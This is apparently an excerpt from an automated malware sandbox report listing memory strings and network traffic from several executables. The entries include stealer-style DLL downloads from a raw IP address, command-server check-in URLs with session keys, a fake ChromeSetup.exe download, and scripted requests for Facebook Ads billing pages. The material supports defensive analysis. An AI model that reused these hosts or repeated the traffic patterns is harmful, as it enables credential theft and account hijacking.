Source: D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldll
Source: D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllv
Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
Source: D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldll
Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldllv
Source: D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dllu
Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
Source: D8D3.exe, 00000013.00000003.485237869.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518405637.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465181701.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518803014.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517399688.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518546624.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462433139.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517988516.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446507226.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllt
Source: D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllv
Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/ll
Source: 98D7.exe, 00000010.00000003.482623800.000000000056A000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: http://iueg.aapp
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.502829346.000000000288E000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000568000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000289F000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/check/safe
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/check/safeB
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/check/safeT7-16b8-4
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/check/safeXdkojlmpp
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/check/safei
Source: 98D7.exe, 00000010.00000003.492565099.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com/m
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iueg.aappatey.com:80/check/safe
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://perficut.at/
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://perw.facebook.cueg.aappatey.com/check/safe
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/K
Source: 98D7.exe, 00000010.00000003.502829346.000000000288E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675c
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMu
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef
Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef92RUnKXp
Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E4
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor
Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com/r
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef
Source: explorer.exe, 00000004.00000000.303832836.000000000F270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 98D7.exe, 00000010.00000003.474645572.0000000002892000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://messenger.com/
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/qu9vi-bmWl3.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0
Source: 98D7.exe, 00000010.00000003.476889083.000000000288E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/4x04rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/mkZZ0EnRB0x.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/2Z9gzYPL3TW.js?_nc_x=Ij3Wp8lg5Kz
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yX/l/en_US/WYC6LbamQUd.js?_nc_x=Ij3Wp8lg5Kz
Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: potunulit.org
Source: global traffic HTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
